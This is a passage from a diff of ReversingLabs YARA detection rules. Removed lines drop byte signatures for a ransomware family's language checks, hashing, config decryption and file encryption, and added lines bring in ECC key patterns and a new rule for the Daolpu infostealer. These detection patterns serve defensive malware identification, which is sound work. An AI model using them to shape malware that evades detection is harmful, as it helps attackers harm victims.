7C EF D3 CC FA + 3A 9A B5 A7 63 13 3D 01 E0 49 3E FA C1 47 C9 92 + B3 3A D7 FE 6F 9C F7 9A 3A 0F F5 0E 0A 0A C3 3F + C8 E7 12 14 8E D5 D5 6D 98 2C B3 71 32 0A EB 2A + BD F6 D7 6A 20 0B 67 45 9C D2 B2 BF 53 22 66 09 + 5D DB 11 F3 F1 05 33 58 A3 E2 B8 CF 7C CD 82 9B + BD } - $check_blacklisted_languages_v2 = { - FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74 - ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B - C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ?? - 66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04 - ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9 - 22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64 - A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33 - FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D - 76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ?? - ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B - C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ?? - 3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40 - ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA - 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55 - ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A - ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3 + $ecc_public_key_7 = { + 04 4A EE 58 AE 4D CA 66 DE 06 3A A3 11 FC E0 18 + F0 6E 1C BA 2D 30 0C 89 D9 D6 EE 9B 73 83 A9 23 + 15 8C 2F 59 8A 5A DD 14 EA 9D 59 2B 43 B7 06 EC + 32 B6 BA EE 41 B5 AD 5D A1 85 CC EA 1D 14 66 A3 + 67 7E 46 E2 94 F3 E7 B6 56 A1 15 59 A1 4F 37 97 + B9 22 1E BD 11 EB F4 B2 1F 5E C3 14 9A E5 D9 97 + 99 } - $create_net_host_trav_threads_v2 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 64 A1 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? - ?? ?? ?? E8 ?? ?? ?? ?? FF D0 85 C0 78 ?? A1 ?? ?? ?? ?? 8D 0C 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 35 + $ecc_public_key_8 = { + 04 DD A7 D9 BB 8A B8 0B FB 0B 7F 21 D2 F0 BE BE + 73 F3 33 5D 1A BC 34 EA DE C6 9B BC D0 95 F6 F0 + CC D0 0B BA 61 5B 51 46 7E 9E 2D 9F EE 8E 63 0C + 17 EC 07 70 F5 CF 84 2E 40 83 9C E8 3F 41 6D 3B + AD D3 A4 14 59 36 78 9D 03 43 EE 10 13 6C 72 DE + AE 88 A7 A1 6B B5 43 CE 67 DC 23 FF 03 1C A3 E2 + 3E } - $fnv1a_hashing_v2 = { - 55 8B EC 83 EC ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B 50 ?? A1 ?? ?? ?? ?? - 89 55 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 75 ?? 33 C0 A3 ?? ?? ?? ?? 8B E5 5D C3 8B 42 - ?? 8B 4C 10 ?? 8B 44 10 ?? 89 45 ?? 8D 04 11 89 45 ?? 3B C2 74 ?? 53 33 C9 56 57 89 - 4D ?? 39 48 ?? 74 ?? 8B 78 ?? 03 FA 8B 07 BE + $ecc_public_key_9 = { + 04 D7 66 B5 1B DB AE B3 60 EE 46 EA 88 63 75 3B + 2A 94 6D F3 5F 12 F6 E3 0F 9E B6 0A 14 53 48 52 + C8 DC 3A B3 CB 48 20 26 12 4E FA 89 84 D4 DF 91 + E4 29 7D 28 01 D9 DB 18 43 69 A1 1F B5 D3 86 16 + DC C7 7F 67 23 DF DF 31 31 83 03 35 70 B1 4B B7 + C8 17 BB 51 CB DC 94 17 DB EA 09 3B 76 12 DE AA + B5 } - $decrypt_configuration_v2_1 = { - 55 8B EC 51 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C9 83 EA ?? 75 ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? BA 25 1B 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? - ?? ?? ?? BA 78 0C 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - BA 39 28 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA F1 40 - 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA BF 11 00 00 B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 28 02 00 00 B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA 3B 07 00 00 B9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? BA A5 04 00 00 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? BA 0F 03 00 00 B9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 C9 BE ?? ?? ?? ?? 85 FF 74 ?? 8B 15 ?? - ?? ?? ?? 0F 1F 44 00 ?? 80 3C 0A ?? 8D 46 ?? 0F 45 C6 41 8B F0 3B CF 72 ?? 8D 0C B5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 1D ?? ?? ?? ?? 85 DB 74 ?? 33 FF 85 F6 74 ?? 90 - B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 04 BB 47 3B FE 72 ?? 8B 0D ?? ?? - ?? ?? 33 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 0F 1F 80 ?? ?? ?? ?? 8B 14 B3 8A 08 8D 40 ?? - 88 0A 8D 52 ?? 84 C9 75 ?? 33 C9 E8 ?? ?? ?? ?? 46 85 C0 75 ?? C7 04 B3 ?? ?? ?? ?? - 5F 5E 5B 8B E5 5D C3 + $ecc_public_key_10 = { + 04 15 B1 E8 FD 03 15 43 E5 AC EB 87 37 11 62 EF + D2 83 36 52 7D 45 57 0B 4A 8D 7B 54 3B 3A 6E 5F + 15 02 C0 50 A6 CF 25 2F 7D CA 48 B8 C7 50 63 1C + 2A 21 08 7C 9A 36 D8 0B FE D1 26 C5 58 31 30 28 + 25 F3 5D 5D A3 B8 B6 A5 B4 92 ED 6C 2C 9F EB DD + 43 89 A2 3C 4B 48 91 1D 50 EC 26 DF D6 60 2E BD + 21 } - $decrypt_configuration_v2_2 = { - 55 8B EC 51 53 56 57 8B F2 8B F9 6B CE ?? E8 ?? ?? ?? ?? 8B C8 33 C0 89 4D ?? 85 C9 - 0F 84 ?? ?? ?? ?? 85 F6 74 ?? 83 FE ?? 72 ?? 0F 28 0D ?? ?? ?? ?? 8B CE 83 E1 ?? 66 - 0F 1F 84 00 ?? ?? ?? ?? 0F 10 04 07 66 0F EF C1 0F 11 04 07 0F 10 44 07 ?? 66 0F EF - C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF C1 0F 11 44 07 ?? 0F 10 44 07 ?? 66 0F EF - C1 0F 11 44 07 ?? 83 C0 ?? 3B C1 72 ?? 8B 4D ?? 3B C6 73 ?? 80 34 38 5F 40 3B C6 72 - ?? 8B 5D ?? 8B D6 51 53 51 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 0B E8 ?? ?? - ?? ?? 8B F8 8B 45 ?? 89 38 8B 45 ?? 85 FF 74 ?? 8B 0B 8B F0 F3 A4 8B C8 BE ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B C6 5F 5E 5B 8B E5 5D C3 + $ecc_public_key_11 = { + 04 03 47 7B 2F 75 C9 82 15 85 FB 75 E4 91 16 D4 + AB 62 99 F5 3E 52 0B 06 CE 41 00 7F 97 E1 0A 24 + 3C 1D 01 04 EE 3D D2 8D 09 97 0C E0 75 E4 FA FB + 77 8A 2A F5 03 60 4B 36 8B 16 23 16 AD 09 71 F4 + 4A F4 28 50 B4 FE 88 1C 6E 3F 6C 2F 2F 09 59 5B + A5 5B 0B 33 99 E2 C3 3D 89 F9 6A 2C EF B2 D3 06 + E9 } - $encrypt_files_v2_p1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 56 57 66 90 64 A1 ?? ?? ?? ?? 0F 57 C0 C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 0F 13 44 24 ?? 8B 40 ?? 8B 40 ?? 8B 00 8B - 50 ?? A1 ?? ?? ?? ?? 89 54 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B - 42 ?? 8B 4C 10 ?? 8D 04 11 89 44 24 ?? 3B C2 74 ?? 33 C9 89 4C 24 ?? 39 48 ?? 74 ?? - 8B 40 ?? 03 C2 89 44 24 ?? 0F 1F 80 ?? ?? ?? ?? 8B 30 BF C5 9D 1C 81 8A 04 16 03 F2 - 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA 83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF - 69 F9 93 01 00 01 84 C0 75 ?? 8B 54 24 ?? 8B 4C 24 ?? 81 FF ?? ?? ?? ?? 74 ?? 8B 74 - 24 ?? 41 8B 44 24 ?? 83 C0 ?? 89 4C 24 ?? 89 44 24 ?? 3B 4E ?? 75 ?? 33 C0 A3 ?? ?? - ?? ?? 6A ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51 8D 4C 24 ?? 51 FF 35 ?? ?? ?? ?? FF D0 85 - C0 0F 88 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 7C 24 ?? 8B 07 48 83 F8 - ?? 0F 87 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 46 ?? 8D 04 48 0F B7 0C 10 - 8B 46 ?? 8D 04 88 8B 04 10 03 C2 EB ?? 83 7F ?? ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 0F - 85 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? 68 ?? ?? ?? ?? 6A ?? 8B 41 - ?? 89 42 ?? 8B 41 ?? 89 42 ?? 8B 44 24 ?? 6A ?? 8B 40 ?? 8D 88 ?? ?? ?? ?? F7 D8 23 - C8 8B 44 24 ?? 89 48 ?? 8D 4C 24 ?? 8B 54 24 ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? - 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? - ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? FF 76 ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B 4E - ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 81 C1 ?? ?? ?? ?? 03 C1 50 E8 ?? ?? ?? ?? - 8B 4C 24 ?? 83 C4 ?? 8B 74 24 ?? 89 74 24 ?? 6A ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF + $ecc_public_key_12 = { + 04 92 A0 41 E8 4B 82 84 5C E2 F8 31 11 99 86 64 + 4E 09 25 2F 9D 41 2F 0A AE 35 4F 74 95 B2 51 64 + 6B 8D 6B E6 3F 70 95 F0 05 44 47 A6 72 38 50 76 + 95 02 5A 8E AE 28 9E F9 2D 4E 99 EF 2C 48 6F 4C + 25 29 E8 D1 71 5B DF 1D C1 75 37 B4 D7 FA 7B 7A + 42 9C 6A 0A 56 5A 7C 69 0B AA 80 09 24 6C 7E C1 + 46 } - $encrypt_files_v2_p2 = { - 71 ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 - ?? F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? - 33 FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 - 8B 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B C1 - F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 24 - ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? ?? - ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? ?? - 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF E8 - ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? ?? - 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 0F 84 - ?? ?? ?? ?? 8D 7E ?? 90 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 - 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8D 56 ?? 74 ?? 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B - C1 6A ?? EB ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 8D 8C 24 ?? ?? ?? ?? 8B - 57 ?? 50 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 83 7A ?? ?? 8B 42 ?? 0F 8F ?? - ?? ?? ?? 7C ?? 39 42 ?? 0F 87 ?? ?? ?? ?? 8B 74 24 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4E + $ecc_public_key_13 = { + 04 A2 D5 9C 82 7B 95 9D F1 52 78 87 FE 8A 16 BF + 05 E6 DF A3 02 4F 0D 07 C6 00 51 BA 0C 02 52 2D + 22 A4 42 39 C4 FE 8F EA C9 C1 BE D4 4D FF 9F 7A + 9E E2 B1 7C 9A AD A7 86 09 73 87 D1 E7 9A E3 7A + A5 AA 6E FB BA B3 70 C0 67 88 A2 35 D4 A3 9A B1 + FD AD C2 EF 31 FA A8 B9 F3 FB 08 C6 91 D1 FB 29 + 95 } - $encrypt_files_v2_p3 = { - 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 81 C1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 8B 46 ?? 03 C1 50 - E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? C7 00 ?? ?? ?? ?? EB ?? 8B 44 24 ?? C7 00 ?? ?? - ?? ?? 8B 4C 24 ?? 8B 74 24 ?? 6A ?? 89 74 24 ?? 8D 41 ?? 50 FF 71 ?? 8D 41 ?? FF 71 - ?? 50 51 6A ?? 6A ?? FF 76 ?? E8 ?? ?? ?? ?? FF D0 85 C0 0F 89 ?? ?? ?? ?? 83 C8 ?? - F0 0F C1 46 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? 33 - FF 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 8B 0E E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 76 ?? 47 8B - 40 ?? 3B F8 72 ?? 8B 74 24 ?? 85 C0 E9 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 46 ?? 0F 85 ?? - ?? ?? ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 - C9 0F 84 ?? ?? ?? ?? 8D 7E ?? 66 0F 1F 44 00 ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D - 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 72 ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 56 ?? 8B - C1 F0 0F B1 0A 83 F8 ?? 75 ?? 8B 46 ?? 89 44 24 ?? 0F B7 46 ?? 83 C0 ?? 8B C8 89 44 - 24 ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 0F B7 4E ?? 51 FF 76 ?? 8D 4F ?? 51 E8 ?? ?? - ?? ?? 0F B7 46 ?? 83 C4 ?? 89 47 ?? 0F 57 C0 8D 44 24 ?? C6 07 ?? C7 47 ?? ?? ?? ?? - ?? 6A ?? FF 74 24 ?? 66 0F 13 44 24 ?? 57 50 FF 74 24 ?? E8 ?? ?? ?? ?? FF D0 8B CF - E8 ?? ?? ?? ?? 8D 56 ?? 85 F6 0F 84 ?? ?? ?? ?? 83 C8 ?? F0 0F C1 02 0F 85 ?? ?? ?? - ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 85 C9 74 - ?? 8D 7E ?? 8B 0F E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 7F ?? 8B 4E ?? 40 89 44 24 ?? 3B C1 - 72 ?? 85 C9 74 ?? F0 FF 05 ?? ?? ?? ?? F0 FF 0D ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 - E8 ?? ?? ?? ?? FF D0 8D 46 ?? 50 E8 ?? ?? ?? ?? FF D0 8B CE E8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? 5F 33 C0 5E 8B E5 5D C2 + $ecc_public_key_14 = { + 04 98 E9 2F 3D 40 72 A4 ED 93 22 72 81 13 1C DD + 10 95 F1 C5 A3 4E 71 DC 14 16 D9 0E E5 A6 05 2A + 77 64 7B 5F 4E 38 D3 BB 1C 44 B5 7F F5 1F B6 32 + 62 5D C9 E9 84 5B 4F 30 4F 11 5A 00 FD 58 58 0C + A5 F5 0F 2C 4D 07 47 13 75 DA 97 97 97 6F 31 5C + ED 2B 9D 7B 20 3B D8 B9 54 D9 5E 99 A4 3A 51 0A + 31 + } + $ecc_public_key_15 = { + 04 0D 30 5E 1B 15 9D 03 D0 A1 79 35 B7 3A 3C 92 + 7A CA 15 1C CD 62 F3 9C 26 5C 07 3D E5 54 FA A3 + D6 CC 12 EA F4 14 5F E8 8E 19 AB 2F 2E 48 E6 AC + 18 43 78 AC D0 37 C3 BD B2 CD 2C E6 47 E2 1A E6 + 63 B8 3D 2E 2F 78 C4 4F DB F4 0F A4 68 4C 55 72 + 6B 95 1D 4E 18 42 95 78 CC 37 3C 91 E2 9B 65 2B + 29 + } + $ecc_public_key_16 = { + 04 1A AC 54 5A A9 F9 68 23 E7 7A D5 24 6F 53 C6 + 5A D8 4B AB C6 D5 B6 D1 E6 73 71 AE DD 9C D6 0C + 61 FD DB A0 89 03 B8 05 14 EC 57 CE EE 5D 3F E2 + 21 B3 CE F7 D4 8A 79 E0 A3 83 7E 2D 97 D0 61 C4 + F1 99 DC 25 91 63 AB 7F 30 A3 B4 70 E2 C7 A1 33 + 9C F3 BF 2E 5C 53 B1 5F B3 7D 32 7F 8A 34 E3 79 + 79 + } + $ecc_public_key_17 = { + 04 E1 FD 8E B8 43 24 AB 96 7B 85 C2 BA 0B AD 8D + E0 3A E3 24 B9 D2 B1 BE 88 3A CA BF 4A B8 F9 EF + 2C 2F AF 51 50 3C 47 75 6C F8 94 B7 9B FC 28 1E + C5 54 CC 63 9D 16 4B 53 C1 E7 20 AB CD AC 25 D2 + 7F 8F C2 C1 5A 82 5E 30 8B 7A 54 CE 03 B5 91 7F + AA 94 D0 D1 8A 48 CC 82 05 26 A1 D5 51 12 D6 7B + 36 + } + $ecc_public_key_18 = { + 04 19 E7 BC AC 44 65 ED CD B8 3F 58 FB 8D B1 57 + A9 44 2D 05 15 F2 EF 0B FF 10 74 9F B5 62 52 5F + 66 7E 1F E5 DC 1B 45 79 0B CC C6 53 0A 9D 8D 5D + 02 D9 A9 59 DE 02 5A F6 95 2A 0E 8D 38 4A 8A 49 + C6 BC C6 03 38 07 5F 55 DA 7E 09 6E E2 7F 5E D0 + 45 20 0F 59 76 10 D6 A0 24 F0 2D DE 36 F2 6C 29 + 39 + } + $ecc_public_key_19 = { + 04 B8 C6 79 D3 8F 6C 25 0E 9F 2E 39 19 1C 03 A4 + AE 9A E5 39 07 09 16 CA 63 B1 B9 86 F8 8A 57 C1 + 57 CE 42 FA 73 A1 F7 65 42 FF 1E C1 00 B2 6E 73 + 0E FF C7 21 E5 18 A4 AA D9 71 3F A8 D4 B9 CE 8C + 1D + } + $ecc_public_key_20 = { + 04 C7 11 16 2A 76 1D 56 8E BE B9 62 65 D4 C3 CE + B4 F0 C3 30 EC 8F 6D D7 6E 39 BC C8 49 AB AB B8 + E3 43 78 D5 81 06 5D EF C7 7D 9F CE D6 B3 90 75 + DE 0C B0 90 DE 23 BA C8 D1 3E 67 E0 19 A9 1B 86 + 31 1E 5F 34 2D EE 17 FD 15 FB 7E 27 8A 32 A1 EA + C9 8F C9 7E 18 CB 2F 3B 2C 48 7A 7D A6 F4 01 07 + AC + } + $ecc_public_key_21 = { + 04 DE CD BB 70 20 F1 25 20 B4 94 E8 D7 B4 3B 0F + 6E 87 DD AB AC CF 4D 40 2F 81 33 6B 59 09 18 D6 + 87 0D 26 23 9C B4 8D 95 9D 76 9F A5 B9 06 42 E6 + AD 36 B2 C4 B3 AE 7A 3C 08 D5 CB 9D 3A 5E 45 21 + 6C 0B E3 20 F5 9B C2 DD 44 33 E3 42 B9 EA F2 28 + 42 92 AA FE 0C 07 CA 8A 13 99 3B 62 00 ED DA F3 + 35 + } + $ecc_public_key_22 = { + 04 5C D1 EE 57 0D D1 EF 81 7C 26 91 62 C3 6B E7 + FC 73 A9 A0 C3 37 44 DC D6 F8 31 E2 77 93 5F 8F + EB E3 ED 38 73 F5 FC 8B 55 B9 14 A5 8F 2C 44 28 + 19 AF 5D FB DE 09 58 C9 29 B3 A9 99 D3 75 13 3C + A9 } condition: - uint16(0)==0x5A4D and ((($enum_resources_v1) and ( all of ($find_files_v1_*)) and ( all of ($encrypt_files_v1_*))) or (($check_blacklisted_languages_v2) and ($fnv1a_hashing_v2) and ($create_net_host_trav_threads_v2) and ( all of ($decrypt_configuration_v2_*)) and ( all of ($encrypt_files_v2_p*)))) + uint16(0)==0x5A4D and ($oid_prime_explicit) and ( any of ($ecc_public_key_*)) and (pe.number_of_signatures>0) } -rule REVERSINGLABS_Win32_Ransomware_Cryptofortress : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects CryptoFortress ransomware." + description = "Yara rule that detects Daolpu infostealer." author = "ReversingLabs" - id = "460289b1-f775-5e0b-8c44-4f6e5c92da60" - date = "2020-07-15" - modified = "2020-07-15" + id = "bf815556-6ccf-506a-b858-5f4c18282c05" + date = "2024-08-26" + modified = "2024-08-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.CryptoFortress.yara#L1-L162" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "474893b63523de5ff9eb8a0c91b0677b99ce65056af7f5d02a73e43fa65453c9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/infostealer/Win64.Infostealer.Daolpu.yara#L1-L322" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5ffd0427c6c8e666cfabc48426e7771595a7024548706f37a1de3538e4e2d559" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "CryptoFortress" + tc_detection_type = "Infostealer" + tc_detection_name = "Daolpu" tc_detection_factor = 5 importance = 25 strings: - $enum_drives = { - 55 8B EC 83 C4 ?? 56 57 C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 8D 7D ?? B2 ?? B9 ?? ?? ?? ?? A9 ?? ?? ?? ?? 74 ?? 88 17 47 D1 E8 FE C2 49 - 75 ?? C6 07 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F8 8D 75 ?? 8A 16 88 55 ?? 8D 45 ?? 50 - FF 15 ?? ?? ?? ?? 8D 55 ?? C6 42 ?? ?? 83 F8 ?? 75 ?? 60 8D 45 ?? 50 8D 45 ?? 50 6A - ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? - 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? 61 46 4F 75 ?? A1 ?? ?? ?? ?? A3 - ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 5F 5E C9 C3 + $network_communication = { + 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 7C 24 ?? 41 56 48 83 EC ?? 48 8B D9 49 8B E8 B9 + ?? ?? ?? ?? 4C 8B F2 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? + ?? 4C 8D 05 ?? ?? ?? ?? 48 89 74 24 ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 + 7B ?? ?? 4C 8D 43 ?? 76 ?? 4D 8B 00 BA ?? ?? ?? 